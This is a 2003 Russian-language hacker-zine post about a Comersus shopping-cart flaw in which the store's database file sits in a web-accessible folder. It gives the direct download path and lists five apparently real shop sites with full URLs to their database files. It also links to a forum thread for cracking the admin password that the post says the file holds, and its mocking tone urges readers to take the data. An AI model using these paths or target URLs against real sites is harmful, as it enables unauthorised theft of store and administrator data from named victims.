Обнаружена новая уязвимость в системе управления покупками Comersus

1 июля 2003 была обнаружена новая уязвимость в системе управления покупками Comersus.
Удаленный пользователь (да-да, парень и ты тоже) может просматривать базу данных магазина.
В конфигурации по умолчанию, база данных магазина в хранится в каталоге Web-сервера, который доступен удаленному пользователю. Вообщем, вбиваешь в бродилке:
http://www.victim.cov/database/comersus.mdb - и база твоя.
Как найти магазины с этой системой, ты наверное уже знаешь. Иначе зачем ты вообще это читаешь?
А для самых ленивых вот урлы:
http://www.sjconsultinggroup.com/comersus/database/comersus.mdb
http://www.comwebtech.com.au/final/database/comersus.mdb
http://www.gardenofthegourds.com/database/comersus.mdb
http://www.jeswin.com/database/comersus.mdb
http://thetestoftime.com/database/comersus.mdb

Правда карт там вроде как нет, зато есть пароль админа, правда зашифрованный, но для тех кто хочет его дешифровать я дам урлик
http://forum.securitylab.ru/forum_posts.asp?TID=4418

durito